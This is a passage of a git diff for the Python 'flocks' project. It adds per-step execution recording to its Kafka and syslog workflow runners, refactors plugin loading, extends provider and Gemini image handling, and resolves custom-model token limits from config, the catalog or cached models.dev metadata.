         # the Device Access wizard (the latter consumes
         # ``api_services[storage_key]`` shaped by ``discover_api_service_descriptors``).
         from flocks.config.api_versioning import discover_api_service_descriptors
+        from flocks.tool.device.plugin_index import clear_device_template_cache
         from flocks.tool.registry import ToolRegistry
 
         ToolRegistry.init()
         ToolRegistry.refresh_plugin_tools()
+        clear_device_template_cache()
         # Drop the descriptor cache so freshly installed/uninstalled
         # API plugins surface in ``_load_provider_yaml_metadata`` (and
         # therefore in the Tool API summary metadata) without waiting
diff --git a/flocks/ingest/kafka/manager.py b/flocks/ingest/kafka/manager.py
index 37187f732..34a30a07f 100644
--- a/flocks/ingest/kafka/manager.py
+++ b/flocks/ingest/kafka/manager.py
@@ -34,6 +34,7 @@
     compact_history_for_storage,
     compact_outputs_for_storage,
     create_execution_record,
+    ExecutionStepRecorder,
     record_execution_result,
     resolve_execution_outcome,
 )
@@ -209,6 +210,20 @@ def _compact_history_for_kafka_storage(
     return compacted
 
 
+def _compact_step_for_kafka_storage(
+    step: Any,
+    *,
+    input_key: str,
+    input_keys: Iterable[str] | None = None,
+) -> Dict[str, Any]:
+    compacted = _compact_history_for_kafka_storage(
+        [step],
+        input_key=input_key,
+        input_keys=input_keys,
+    )
+    return compacted[0] if compacted and isinstance(compacted[0], dict) else {}
+
+
 class KafkaManager:
     """One async consumer task per workflow id (when enabled)."""
 
@@ -655,9 +670,21 @@ async def _executor(mapped_inputs: Dict[str, Any]) -> Dict[str, Any]:
                 input_params=summarized_inputs,
             )
             exec_id = exec_data["id"]
+            loop = asyncio.get_running_loop()
             start_time = time.time()
             trigger_meta = mapped_inputs.get("_flocks", {}).get("trigger", {})
             trigger_input_keys = list((trigger.mapping or {}).keys()) or [input_key]
+            step_recorder = ExecutionStepRecorder(
+                exec_id=exec_id,
+                loop=loop,
+                logger=log,
+                log_event="kafka.execution_step.write_failed",
+                step_compactor=lambda step: _compact_step_for_kafka_storage(
+                    step,
+                    input_key=input_key,
+                    input_keys=trigger_input_keys,
+                ),
+            )
             try:
                 result = await asyncio.to_thread(
                     run_workflow,
@@ -665,23 +692,23 @@ async def _executor(mapped_inputs: Dict[str, Any]) -> Dict[str, Any]:
                     inputs=mapped_inputs,
                     trace=False,
                     history_mode="summary",
+                    on_step_complete=step_recorder.on_step_complete,
                 )
                 status, error_msg = resolve_execution_outcome(result)
                 duration = time.time() - start_time
+                step_count = step_recorder.step_count or result.steps
+                exec_data.update(step_recorder.summary)
                 exec_data.update({
                     "status": status,
                     "outputResults": _compact_for_kafka_storage(result.outputs),
                     "finishedAt": int(time.time() * 1000),
                     "duration": duration,
                     "errorMessage": error_msg,
-                    "executionLog": _compact_history_for_kafka_storage(
-                        result.history,
-                        input_key=input_key,
-                        input_keys=trigger_input_keys,
-                    ),
+                    "executionLog": [],
+                    "stepCount": step_count,
                     "currentNodeId": result.last_node_id,
                     "currentPhase": status,
-                    "currentStepIndex": result.steps,
+                    "currentStepIndex": step_count,
                     "triggerId": trigger.id,
                     "triggerType": trigger.type,
                     "deliveryId": trigger_meta.get("deliveryId"),
@@ -694,11 +721,13 @@ async def _executor(mapped_inputs: Dict[str, Any]) -> Dict[str, Any]:
                     "kafka.workflow_run_failed",
                     {"workflow_id": workflow_id, "exec_id": exec_id, "error": str(exc)},
                 )
+                exec_data.update(step_recorder.summary)
                 exec_data.update({
                     "status": "error",
                     "errorMessage": str(exc),
                     "finishedAt": int(time.time() * 1000),
                     "duration": duration,
+                    "executionLog": [],
                     "currentPhase": "error",
                     "triggerId": trigger.id,
                     "triggerType": trigger.type,
diff --git a/flocks/ingest/syslog/manager.py b/flocks/ingest/syslog/manager.py
index 8e938dbd4..5c45b8d51 100644
--- a/flocks/ingest/syslog/manager.py
+++ b/flocks/ingest/syslog/manager.py
@@ -10,9 +10,9 @@
 from flocks.storage.storage import Storage
 from flocks.utils.log import Log
 from flocks.workflow.execution_store import (
-    compact_history_for_storage,
     compact_outputs_for_storage,
     create_execution_record,
+    ExecutionStepRecorder,
     record_execution_result,
     resolve_execution_outcome,
 )
@@ -522,6 +522,13 @@ async def _executor(mapped_inputs: Dict[str, Any]) -> Dict[str, Any]:
                 input_params=summarized_inputs,
             )
             exec_id = exec_data["id"]
+            loop = asyncio.get_running_loop()
+            step_recorder = ExecutionStepRecorder(
+                exec_id=exec_id,
+                loop=loop,
+                logger=log,
+                log_event="syslog.execution_step.write_failed",
+            )
             start_time = time.time()
             trigger_meta = mapped_inputs.get("_flocks", {}).get("trigger", {})
             try:
@@ -530,19 +537,23 @@ async def _executor(mapped_inputs: Dict[str, Any]) -> Dict[str, Any]:
                     workflow=workflow_json,
                     inputs=mapped_inputs,
                     trace=False,
+                    on_step_complete=step_recorder.on_step_complete,
                 )
                 status, error_msg = resolve_execution_outcome(result)
                 duration = time.time() - start_time
+                step_count = step_recorder.step_count or result.steps
+                exec_data.update(step_recorder.summary)
                 exec_data.update({
                     "status": status,
                     "outputResults": compact_outputs_for_storage(result.outputs),
                     "finishedAt": int(time.time() * 1000),
                     "duration": duration,
                     "errorMessage": error_msg,
-                    "executionLog": compact_history_for_storage(result.history),
+                    "executionLog": [],
+                    "stepCount": step_count,
                     "currentNodeId": result.last_node_id,
                     "currentPhase": status,
-                    "currentStepIndex": result.steps,
+                    "currentStepIndex": step_count,
                     "triggerId": trigger.id,
                     "triggerType": trigger.type,
                     "deliveryId": trigger_meta.get("deliveryId"),
@@ -555,11 +566,13 @@ async def _executor(mapped_inputs: Dict[str, Any]) -> Dict[str, Any]:
                     "syslog.workflow_run_failed",
                     {"workflow_id": workflow_id, "exec_id": exec_id, "error": str(exc)},
                 )
+                exec_data.update(step_recorder.summary)
                 exec_data.update({
                     "status": "error",
                     "errorMessage": str(exc),
                     "finishedAt": int(time.time() * 1000),
                     "duration": duration,
+                    "executionLog": [],
                     "currentPhase": "error",
                     "triggerId": trigger.id,
                     "triggerType": trigger.type,
diff --git a/flocks/input/dispatcher.py b/flocks/input/dispatcher.py
index 4d64b6ebf..95f8c9916 100644
--- a/flocks/input/dispatcher.py
+++ b/flocks/input/dispatcher.py
@@ -3,7 +3,7 @@
 from __future__ import annotations
 
 from dataclasses import dataclass
-from typing import Optional
+from typing import Any, Dict, Optional
 
 from flocks.command.command import Command
 from flocks.command.handler import handle_slash_command
@@ -20,7 +20,10 @@ class DispatchResult:
     handled: bool = True
 
 
-def parse_slash_command(text: str) -> Optional[ParsedCommand]:
+def parse_slash_command(
+    text: str,
+    metadata: Optional[Dict[str, Any]] = None,
+) -> Optional[ParsedCommand]:
     """Parse slash text into a command and registry metadata."""
     stripped = (text or "").strip()
     if not stripped.startswith("/"):
@@ -38,6 +41,7 @@ def parse_slash_command(text: str) -> Optional[ParsedCommand]:
         command_name=command_name.lower(),
         canonical_name=canonical_name,
         args=raw_args.strip(),
+        args_json=metadata.get("commandArgumentsJson") if isinstance(metadata, dict) else None,
         command_def=command_def,
     )
 
@@ -48,7 +52,7 @@ def _has_non_text_parts(event: UserInputEvent) -> bool:
 
 async def dispatch_user_input(event: UserInputEvent, sink: OutputSink) -> DispatchResult:
     """Route a normalized user input through direct / llm / session-control paths."""
-    parsed = parse_slash_command(event.text)
+    parsed = parse_slash_command(event.text, event.metadata)
     if parsed is None:
         await sink.run_llm(event, event.text, event.display_text)
         return DispatchResult(action="llm", handled=False)
@@ -112,14 +116,18 @@ async def _collect_prompt(prompt: str) -> None:
         clear_history_cb = getattr(sink, "_clear_history", None)
         handled = await handle_slash_command(
             parsed.raw_text,
+            parsed_command=parsed,
             send_text=_collect_text,
             send_prompt=_collect_prompt,
             clear_screen=clear_cb,
             clear_history=clear_history_cb,
             surface=sink.surface,
+            session_id=event.session_id,
         )
         if handled:
             if llm_prompts:
+                if direct_texts:
+                    await sink.publish_direct_response(event, "\n".join(direct_texts))
                 await sink.run_llm(
                     event,
                     llm_prompts[0],
diff --git a/flocks/input/events.py b/flocks/input/events.py
index 0995b8db5..d0fd4e54c 100644
--- a/flocks/input/events.py
+++ b/flocks/input/events.py
@@ -50,4 +50,5 @@ class ParsedCommand(BaseModel):
     command_name: str
     canonical_name: str
     args: str = ""
+    args_json: Optional[Any] = None
     command_def: Optional[CommandInfo] = None
diff --git a/flocks/plugin/loader.py b/flocks/plugin/loader.py
index 0c1c897e2..b0144a178 100644
--- a/flocks/plugin/loader.py
+++ b/flocks/plugin/loader.py
@@ -8,10 +8,11 @@
 - how to validate items and detect duplicates,
 - a *consumer* callback that receives the validated items.
 
-``PluginLoader.load_all()`` is called once during startup.  For every
-registered extension point it scans the corresponding subdirectory, loads each
-``.py`` module, extracts and validates the attribute, then hands the items to
-the consumer.
+``PluginLoader.load_all()`` loads every registered extension point.
+``PluginLoader.load_extension("TOOLS")`` loads one registered extension point
+with the same filesystem scanning rules. For every loaded extension point it
+scans the corresponding subdirectory, loads each ``.py`` module, extracts and
+validates the attribute, then hands the items to the consumer.
 
 Safety guarantees
 -----------------
@@ -231,61 +232,14 @@ def load_all(
         4. Validate, dedup, and dispatch to the consumer.
         """
         project_dir = project_dir or Path.cwd()
-        project_plugin_root = project_dir / ".flocks" / "plugins"
 
         for ext in cls._extension_points.values():
-            if ext.load_once and ext._loaded:
-                log.debug(
-                    "plugin.load_all.skip_load_once",
-                    {
-                        "attr": ext.attr_name,
-                    },
-                )
-                continue
-
-            ext._seen_keys = set()
-
-            # 1. User-level plugin subdirectory (~/.flocks/plugins/{subdir}/)
-            subdir_path = cls._plugin_root / ext.subdir
-            default_sources = scan_directory(
-                subdir_path,
-                recursive=ext.recursive,
-                max_depth=ext.max_depth,
-                exclude_subdirs=ext.exclude_subdirs,
+            cls._load_extension_point(
+                ext,
+                extra_sources=extra_sources,
+                project_dir=project_dir,
+                log_scope="load_all",
             )
-            if default_sources:
-                log.debug(
-                    "plugin.scan",
-                    {
-                        "subdir": ext.subdir,
-                        "files": [Path(s).name for s in default_sources],
-                    },
-                )
-            cls._load_sources_for_ext(ext, default_sources, subdir_path)
-
-            # 2. Project-level plugin subdirectory (<project>/.flocks/plugins/{subdir}/)
-            project_subdir_path = project_plugin_root / ext.subdir
-            if project_subdir_path != subdir_path and project_subdir_path.is_dir():
-                project_sources = scan_directory(
-                    project_subdir_path,
-                    recursive=ext.recursive,
-                    max_depth=ext.max_depth,
-                    exclude_subdirs=ext.exclude_subdirs,
-                )
-                if project_sources:
-                    log.debug(
-                        "plugin.project.scan",
-                        {
-                            "subdir": ext.subdir,
-                            "project_dir": str(project_dir),
-                            "files": [Path(s).name for s in project_sources],
-                        },
-                    )
-                    cls._load_sources_for_ext(ext, project_sources, project_subdir_path)
-
-            # 3. Explicit sources from cfg.plugin
-            if extra_sources:
-                cls._load_sources_for_ext(ext, extra_sources, project_dir)
 
             if ext.load_once:
                 ext._loaded = True
@@ -293,6 +247,39 @@ def load_all(
         # 4. Installed package entry-points
         cls._load_entry_points()
 
+    @classmethod
+    def load_extension(
+        cls,
+        attr_name: str,
+        extra_sources: Optional[List[str]] = None,
+        project_dir: Optional[Path] = None,
+        *,
+        load_entry_points: bool = False,
+    ) -> None:
+        """Load one registered extension point using normal plugin scan rules.
+
+        This is the scoped counterpart to :meth:`load_all`. It scans the same
+        user-level, project-level, and explicit ``cfg.plugin`` sources, but only
+        dispatches the requested attribute (for example ``"TOOLS"``).
+
+        Set ``load_entry_points`` only for compatibility paths that still need
+        legacy package plugins from the global ``flocks.plugins`` entry-point
+        group.
+        """
+        ext = cls._extension_points.get(attr_name)
+        if ext is None:
+            log.warn("plugin.ext_point.not_found", {"attr": attr_name})
+            return
+
+        cls._load_extension_point(
+            ext,
+            extra_sources=extra_sources,
+            project_dir=project_dir or Path.cwd(),
+            log_scope="load_extension",
+        )
+        if load_entry_points:
+            cls._load_entry_points()
+
     @classmethod
     def load_for_extension(
         cls,
@@ -357,6 +344,73 @@ def load_default_for_extension(cls, attr_name: str) -> List[Any]:
     # Internal
     # ------------------------------------------------------------------
 
+    @classmethod
+    def _load_extension_point(
+        cls,
+        ext: ExtensionPoint,
+        *,
+        extra_sources: Optional[List[str]],
+        project_dir: Path,
+        log_scope: str,
+    ) -> None:
+        """Scan and load one registered extension point."""
+        if ext.load_once and ext._loaded:
+            log.debug(
+                f"plugin.{log_scope}.skip_load_once",
+                {
+                    "attr": ext.attr_name,
+                },
+            )
+            return
+
+        ext._seen_keys = set()
+        project_plugin_root = project_dir / ".flocks" / "plugins"
+
+        # 1. User-level plugin subdirectory (~/.flocks/plugins/{subdir}/)
+        subdir_path = cls._plugin_root / ext.subdir
+        default_sources = scan_directory(
+            subdir_path,
+            recursive=ext.recursive,
+            max_depth=ext.max_depth,
+            exclude_subdirs=ext.exclude_subdirs,
+        )
+        if default_sources:
+            log.debug(
+                "plugin.scan",
+                {
+                    "subdir": ext.subdir,
+                    "files": [Path(s).name for s in default_sources],
+                },
+            )
+        cls._load_sources_for_ext(ext, default_sources, subdir_path)
+
+        # 2. Project-level plugin subdirectory (<project>/.flocks/plugins/{subdir}/)
+        project_subdir_path = project_plugin_root / ext.subdir
+        if project_subdir_path != subdir_path and project_subdir_path.is_dir():
+            project_sources = scan_directory(
+                project_subdir_path,
+                recursive=ext.recursive,
+                max_depth=ext.max_depth,
+                exclude_subdirs=ext.exclude_subdirs,
+            )
+            if project_sources:
+                log.debug(
+                    "plugin.project.scan",
+                    {
+                        "subdir": ext.subdir,
+                        "project_dir": str(project_dir),
+                        "files": [Path(s).name for s in project_sources],
+                    },
+                )
+                cls._load_sources_for_ext(ext, project_sources, project_subdir_path)
+
+        # 3. Explicit sources from cfg.plugin
+        if extra_sources:
+            cls._load_sources_for_ext(ext, extra_sources, project_dir)
+
+        if ext.load_once:
+            ext._loaded = True
+
     @classmethod
     def _load_entry_points(cls) -> None:
         """
diff --git a/flocks/provider/catalog.json b/flocks/provider/catalog.json
index b2a02615d..363d1408d 100644
--- a/flocks/provider/catalog.json
+++ b/flocks/provider/catalog.json
@@ -57,6 +57,7 @@
         "family": "minimax",
         "capabilities": {
           "supports_tools": true,
+          "supports_vision": true,
           "supports_reasoning": true,
           "interleaved": {
             "field": "reasoning_details",
diff --git a/flocks/provider/options.py b/flocks/provider/options.py
index d3222f979..07cb66def 100644
--- a/flocks/provider/options.py
+++ b/flocks/provider/options.py
@@ -71,6 +71,27 @@ def _resolve_reasoning_enabled(provider_id: str, model_id: str) -> Optional[bool
         return None
 
 
+def _resolve_default_extra_body(provider_id: str, model_id: str) -> Optional[Dict[str, Any]]:
+    """Read model-level OpenAI-compatible extra_body from flocks.json."""
+    try:
+        from flocks.provider.model_manager import get_model_manager
+
+        setting = get_model_manager().get_setting(provider_id, model_id)
+        if not setting:
+            return None
+
+        default_parameters = setting.default_parameters or {}
+        extra_body = default_parameters.get("extra_body")
+        return dict(extra_body) if isinstance(extra_body, dict) else None
+    except Exception as exc:
+        log.debug("options.extra_body_setting_lookup_failed", {
+            "provider_id": provider_id,
+            "model_id": model_id,
+            "error": str(exc),
+        })
+        return None
+
+
 def _lookup_raw_model_metadata(provider_id: str, model_id: str) -> Optional[Any]:
     """Return provider/model metadata without applying inferred defaults."""
     try:
@@ -269,6 +290,7 @@ def build_provider_options(
         if reasoning_enabled is not None
         else _resolve_reasoning_enabled(provider_id, model_id)
     )
+    configured_extra_body = _resolve_default_extra_body(provider_id, model_id)
     interleaved_enabled = interleaved_capability is not None
     if interleaved_enabled and reasoning_enabled is None:
         reasoning_enabled = True
@@ -322,11 +344,12 @@ def build_provider_options(
     # most reasoning_content models use enable_thinking, while MiniMax's
     # OpenAI-compatible interleaved format uses reasoning_split so the model
     # returns reasoning_details that can be replayed in later tool turns.
-    elif (
-        (interleaved_enabled or reasoning_enabled is True)
-        and reasoning_transport == REASONING_TRANSPORT_GENERIC_CHAT
+    elif reasoning_transport == REASONING_TRANSPORT_GENERIC_CHAT and (
+        configured_extra_body
+        or interleaved_enabled
+        or reasoning_enabled is True
     ):
-        extra_body = _build_generic_chat_extra_body(
+        extra_body = configured_extra_body or _build_generic_chat_extra_body(
             provider_id,
             model_id,
             interleaved_capability,
@@ -391,4 +414,3 @@ def _apply_max_tokens_from_config(
             "model_id": model_id,
             "max_tokens": model_info.capabilities.max_tokens,
         })
-
diff --git a/flocks/provider/sdk/google.py b/flocks/provider/sdk/google.py
index 70de20b6f..39df39669 100644
--- a/flocks/provider/sdk/google.py
+++ b/flocks/provider/sdk/google.py
@@ -3,6 +3,7 @@
 """
 
 import os
+import base64
 import json
 import re
 from typing import List, AsyncIterator, Optional, Dict, Any
@@ -20,6 +21,20 @@
 log = Log.create(service="provider.google")
 
 
+def _image_block_to_gemini_part(block: Dict[str, Any]) -> Optional[Dict[str, Any]]:
+    """Convert a Flocks internal image block to a Gemini inline_data part."""
+    data = block.get("data")
+    mime = block.get("mimeType")
+    if not data or not mime:
+        return None
+    return {
+        "inline_data": {
+            "data": data,
+            "mime_type": mime,
+        }
+    }
+
+
 class GoogleProvider(BaseProvider):
     """Google (Gemini) provider with ReAct text-to-tool parsing and robust error handling"""
 
@@ -132,12 +147,16 @@ def _convert_messages(
                         elif p.type == "file":
                             mime = getattr(p, "mime", "")
                             if mime.startswith("image/"):
-                                parts.append({
-                                    "inline_data": {
-                                        "data": p.url.split(",")[-1] if "," in p.url else p.url,
-                                        "mime_type": mime
-                                    }
-                                })
+                                from flocks.session.utils.file_extractor import read_file_part_bytes
+
+                                data = read_file_part_bytes(getattr(p, "url", ""))
+                                if data:
+                                    parts.append({
+                                        "inline_data": {
+                                            "data": base64.b64encode(data).decode("utf-8"),
+                                            "mime_type": mime,
+                                        }
+                                    })
 
                     gemini_role = "model" if role == "assistant" else "user"
                     if parts:
@@ -179,6 +198,10 @@ def _convert_messages(
                     for p in msg.content:
                         if isinstance(p, dict) and p.get("type") == "text":
                             parts.append({"text": p["text"]})
+                        elif isinstance(p, dict) and p.get("type") == "image":
+                            image_part = _image_block_to_gemini_part(p)
+                            if image_part:
+                                parts.append(image_part)
                 
                 if msg.tool_calls:
                     for tc in msg.tool_calls:
diff --git a/flocks/provider/sdk/openai_base.py b/flocks/provider/sdk/openai_base.py
index 90a7663fe..7c8c595b6 100644
--- a/flocks/provider/sdk/openai_base.py
+++ b/flocks/provider/sdk/openai_base.py
@@ -29,7 +29,7 @@
 # change covers all three providers. Granular values (instead of a flat
 # timeout) let small control-plane requests fail fast while multimodal
 # (image) uploads get the headroom they need on slow links.
-DEFAULT_HTTP_TIMEOUT = httpx.Timeout(connect=30.0, read=600.0, write=600.0, pool=60.0)
+DEFAULT_HTTP_TIMEOUT = httpx.Timeout(connect=30.0, read=180.0, write=1800.0, pool=60.0)
 
 
 # Canonical OpenAI-style content translation, shared by every provider that
diff --git a/flocks/server/app.py b/flocks/server/app.py
index 95f7a6f5e..a605d33b4 100644
--- a/flocks/server/app.py
+++ b/flocks/server/app.py
@@ -322,11 +322,16 @@ def _sync_catalog_models_phase() -> None:
 
     # Sync workflows from .flocks/workflow/ filesystem into Storage
     try:
-        from flocks.server.routes.workflow import sync_workflows_from_filesystem
+        from flocks.server.routes.workflow import (
+            reconcile_published_workflow_api_services,
+            sync_workflows_from_filesystem,
+        )
 
         async def _sync_workflows_phase() -> None:
             imported = await sync_workflows_from_filesystem()
             log.info("workflow.sync.done", {"imported": imported})
+            api_services = await reconcile_published_workflow_api_services()
+            log.info("workflow.api_services.reconciled", api_services)
 
         _schedule_startup_phase(app, log, "workflow.sync_filesystem", _sync_workflows_phase)
     except Exception as e:
diff --git a/flocks/server/client.py b/flocks/server/client.py
index 4ac10a68b..7fb2c911d 100644
--- a/flocks/server/client.py
+++ b/flocks/server/client.py
@@ -13,7 +13,7 @@
 from flocks.agent.registry import Agent
 from flocks.project.project import Project
 from flocks.config.config import Config
-from flocks.mcp.server import get_manager
+from flocks.mcp import get_manager
 from flocks.storage.storage import Storage
 from flocks.utils.log import Log
 
@@ -85,11 +85,13 @@ async def command(
         model: str,
         agent: str,
         directory: str,
+        arguments_json: Optional[Any] = None,
     ) -> None:
         """Execute a command in the session"""
         log.info("session.command", {
             "session_id": session_id,
             "command": command,
+            "arguments_json": arguments_json is not None,
         })
     
     async def summarize(
diff --git a/flocks/server/routes/channel.py b/flocks/server/routes/channel.py
index 4ee07d1a3..aed3dc343 100644
--- a/flocks/server/routes/channel.py
+++ b/flocks/server/routes/channel.py
@@ -33,6 +33,8 @@ class SessionSendRequest(BaseModel):
     text: str
     channel_type: Optional[str] = None
     media_url: Optional[str] = None
+    account_id: Optional[str] = None
+    chat_id: Optional[str] = None
 
 
 @router.post("/send")
@@ -84,6 +86,19 @@ async def channel_session_send(req: SessionSendRequest):
                 detail=f"session '{req.session_id}' 未绑定渠道 '{req.channel_type}'",
             )
 
+    if req.account_id:
+        matched = [b for b in matched if b.account_id == req.account_id]
+    if req.chat_id:
+        matched = [b for b in matched if b.chat_id == req.chat_id]
+    if (req.account_id or req.chat_id) and not matched:
+        raise HTTPException(
+            status_code=404,
+            detail=(
+                f"session '{req.session_id}' 未绑定 account_id='{req.account_id}' "
+                f"chat_id='{req.chat_id}'"
+            ),
+        )
+
     all_results = []
     errors = []
     for binding in matched:
diff --git a/flocks/server/routes/custom_provider.py b/flocks/server/routes/custom_provider.py
index 19f1c361a..969d754ca 100644
--- a/flocks/server/routes/custom_provider.py
+++ b/flocks/server/routes/custom_provider.py
@@ -8,8 +8,10 @@
 Model unique name format: "{provider_id}/{model_id}"
 """
 
+import time
+from dataclasses import dataclass
 from datetime import UTC, datetime
-from typing import List, Optional
+from typing import Any, List, Optional
 
 from fastapi import APIRouter, HTTPException
 from pydantic import BaseModel, Field
@@ -45,6 +47,60 @@ def get_models(self) -> List[ModelInfo]:
 router = APIRouter()
 log = Log.create(service="routes.custom")
 
+FALLBACK_CONTEXT_WINDOW = 128000
+FALLBACK_MAX_OUTPUT_TOKENS = 8192
+MODELS_DEV_URL = "https://models.dev/api.json"
+MODELS_DEV_TIMEOUT_SEC = 5.0
+MODELS_DEV_CACHE_TTL_SEC = 3600.0
+
+_models_dev_cache: Optional[dict[str, Any]] = None
+_models_dev_cache_time = 0.0
+
+_MODELS_DEV_PROVIDER_ALIASES = {
+    "alibaba": "alibaba",
+    "anthropic": "anthropic",
+    "bailian": "alibaba",
+    "cerebras": "cerebras",
+    "cohere": "cohere",
+    "dashscope": "alibaba",
+    "deepinfra": "deepinfra",
+    "deepseek": "deepseek",
+    "gemini": "google",
+    "google": "google",
+    "groq": "groq",
+    "huggingface": "huggingface",
+    "kilocode": "kilo",
+    "kimi-coding": "kimi-for-coding",
+    "kimi-coding-cn": "kimi-for-coding",
+    "mistral": "mistral",
+    "minimax": "minimax",
+    "minimax-cn": "minimax-cn",
+    "nvidia": "nvidia",
+    "ollama-cloud": "ollama-cloud",
+    "opencode-go": "opencode-go",
+    "opencode-zen": "opencode",
+    "openai": "openai",
+    "openai-codex": "openai",
+    "openrouter": "openrouter",
+    "perplexity": "perplexity",
+    "qwen": "alibaba",
+    "qwen-oauth": "alibaba",
+    "siliconflow": "siliconflow",
+    "stepfun": "stepfun",
+    "together": "togetherai",
+    "togetherai": "togetherai",
+    "xai": "xai",
+    "xiaomi": "xiaomi",
+    "zai": "zai",
+}
+
+
+@dataclass
+class ResolvedModelLimits:
+    context_window: int
+    max_output_tokens: int
+    source: str
+
 
 # ==================== Request / Response ====================
 
@@ -67,8 +123,8 @@ class ProviderResp(BaseModel):
 class CreateModelReq(BaseModel):
     model_id: str = Field(..., min_length=1)
     name: str = Field(..., min_length=1)
-    context_window: int = Field(128000, ge=1024)
-    max_output_tokens: int = Field(4096, ge=1)
+    context_window: Optional[int] = Field(None, ge=1024)
+    max_output_tokens: Optional[int] = Field(None, ge=1)
     supports_vision: bool = False
     supports_tools: bool = True
     supports_streaming: bool = True
@@ -208,8 +264,8 @@ async def list_models(provider_id: str):
             model_id=model_id,
             unique_name=f"{provider_id}/{model_id}",
             name=mcfg.get("name", model_id),
-            context_window=mcfg.get("context_window", 128000),
-            max_output_tokens=mcfg.get("max_output_tokens", 4096),
+            context_window=mcfg.get("context_window", FALLBACK_CONTEXT_WINDOW),
+            max_output_tokens=mcfg.get("max_output_tokens", FALLBACK_MAX_OUTPUT_TOKENS),
             input_price=mcfg.get("input_price", 0.0),
             output_price=mcfg.get("output_price", 0.0),
             currency=mcfg.get("currency", "USD"),
@@ -227,12 +283,13 @@ async def create_model(provider_id: str, body: CreateModelReq):
 
     models = raw.get("models", {})
     existing_model = models.get(body.model_id)
+    limits = await _resolve_model_limits(provider_id, body, raw)
 
     now = datetime.now(UTC).isoformat()
     model_config = {
         "name": body.name,
-        "context_window": body.context_window,
-        "max_output_tokens": body.max_output_tokens,
+        "context_window": limits.context_window,
+        "max_output_tokens": limits.max_output_tokens,
         "supports_vision": body.supports_vision,
         "supports_tools": body.supports_tools,
         "supports_streaming": body.supports_streaming,
@@ -247,14 +304,25 @@ async def create_model(provider_id: str, body: CreateModelReq):
     ConfigWriter.add_model(provider_id, body.model_id, model_config)
 
     # Add/update runtime
-    _add_model_to_runtime(provider_id, body)
+    _add_model_to_runtime(
+        provider_id,
+        body,
+        context_window=limits.context_window,
+        max_output_tokens=limits.max_output_tokens,
+    )
 
     action = "updated" if existing_model else "created"
-    log.info(f"custom_model.{action}", {"unique": f"{provider_id}/{body.model_id}"})
+    log.info(f"custom_model.{action}", {
+        "unique": f"{provider_id}/{body.model_id}",
+        "limits_source": limits.source,
+        "context_window": limits.context_window,
+        "max_output_tokens": limits.max_output_tokens,
+    })
     return ModelResp(
         id=body.model_id, provider_id=provider_id, model_id=body.model_id,
         unique_name=f"{provider_id}/{body.model_id}", name=body.name,
-        context_window=body.context_window, max_output_tokens=body.max_output_tokens,
+        context_window=limits.context_window,
+        max_output_tokens=limits.max_output_tokens,
         input_price=body.input_price, output_price=body.output_price,
         currency=body.currency, created_at=now,
     )
@@ -281,6 +349,244 @@ async def delete_model(provider_id: str, model_id: str):
 # ==================== Runtime helpers ====================
 
 
+def _coerce_positive_int(value: Any) -> Optional[int]:
+    """Return value as a positive int, or None when it is not usable."""
+    try:
+        parsed = int(value)
+    except (TypeError, ValueError):
+        return None
+    return parsed if parsed > 0 else None
+
+
+def _extract_limits_from_model(model: Any) -> tuple[Optional[int], Optional[int]]:
+    """Extract context/max-output limits from model metadata objects or dicts."""
+    if model is None:
+        return None, None
+
+    if isinstance(model, dict):
+        context = _coerce_positive_int(model.get("context_window"))
+        max_output = _coerce_positive_int(model.get("max_output_tokens"))
+        limits = model.get("limits")
+        if isinstance(limits, dict):
+            context = context or _coerce_positive_int(limits.get("context_window"))
+            max_output = max_output or _coerce_positive_int(
+                limits.get("max_output_tokens")
+            )
+        return context, max_output
+
+    limits = getattr(model, "limits", None)
+    context = _coerce_positive_int(getattr(limits, "context_window", None))
+    max_output = _coerce_positive_int(getattr(limits, "max_output_tokens", None))
+
+    capabilities = getattr(model, "capabilities", None)
+    context = context or _coerce_positive_int(
+        getattr(capabilities, "context_window", None)
+    )
+    max_output = max_output or _coerce_positive_int(
+        getattr(capabilities, "max_tokens", None)
+    )
+    return context, max_output
+
+
+def _merge_missing_limits(
+    context_window: Optional[int],
+    max_output_tokens: Optional[int],
+    candidate_context: Optional[int],
+    candidate_max_output: Optional[int],
+) -> tuple[Optional[int], Optional[int]]:
+    """Fill missing limit values from a candidate source."""
+    if context_window is None and candidate_context is not None:
+        context_window = candidate_context
+    if max_output_tokens is None and candidate_max_output is not None:
+        max_output_tokens = candidate_max_output
+    return context_window, max_output_tokens
+
+
+def _resolve_catalog_limits(
+    provider_id: str,
+    model_id: str,
+    raw_provider: dict[str, Any],
+) -> tuple[Optional[int], Optional[int]]:
+    """Resolve limits from existing provider config, catalog, or runtime models."""
+    raw_models = raw_provider.get("models", {})
+    if isinstance(raw_models, dict):
+        context, max_output = _extract_limits_from_model(raw_models.get(model_id))
+        if context is not None or max_output is not None:
+            return context, max_output
+
+    try:
+        from flocks.provider.model_catalog import get_provider_model_definitions
+
+        for model_def in get_provider_model_definitions(provider_id):
+            if model_def.id == model_id:
+                return _extract_limits_from_model(model_def)
+    except Exception as exc:
+        log.debug("custom_model.catalog_limits_failed", {
+            "provider_id": provider_id,
+            "model_id": model_id,
+            "error": str(exc),
+        })
+
+    try:
+        model = Provider.resolve_model(provider_id, model_id)
+        return _extract_limits_from_model(model)
+    except Exception as exc:
+        log.debug("custom_model.runtime_limits_failed", {
+            "provider_id": provider_id,
+            "model_id": model_id,
+            "error": str(exc),
+        })
+    return None, None
+
+
+def _models_dev_provider_id(provider_id: str, model_id: str = "") -> Optional[str]:
+    """Map a Flocks provider id to the models.dev provider id when known."""
+    normalized = provider_id.lower().removeprefix("custom-")
+    if normalized in _MODELS_DEV_PROVIDER_ALIASES:
+        return _MODELS_DEV_PROVIDER_ALIASES[normalized]
+    if ":" in model_id:
+        prefix = model_id.split(":", 1)[0].lower()
+        return _MODELS_DEV_PROVIDER_ALIASES.get(prefix)
+    return None
+
+
+async def _fetch_models_dev() -> Optional[dict[str, Any]]:
+    """Fetch models.dev metadata with a short timeout and in-memory cache."""
+    global _models_dev_cache, _models_dev_cache_time
+    now = time.monotonic()
+    if (
+        _models_dev_cache is not None
+        and now - _models_dev_cache_time < MODELS_DEV_CACHE_TTL_SEC
+    ):
+        return _models_dev_cache
+
+    try:
+        import httpx
+
+        async with httpx.AsyncClient(timeout=MODELS_DEV_TIMEOUT_SEC) as client:
+            response = await client.get(MODELS_DEV_URL)
+            response.raise_for_status()
+            data = response.json()
+    except Exception as exc:
+        log.warning("custom_model.models_dev_fetch_failed", {"error": str(exc)})
+        return _models_dev_cache
+
+    if not isinstance(data, dict):
+        log.warning("custom_model.models_dev_invalid_payload", {})
+        return _models_dev_cache
+
+    _models_dev_cache = data
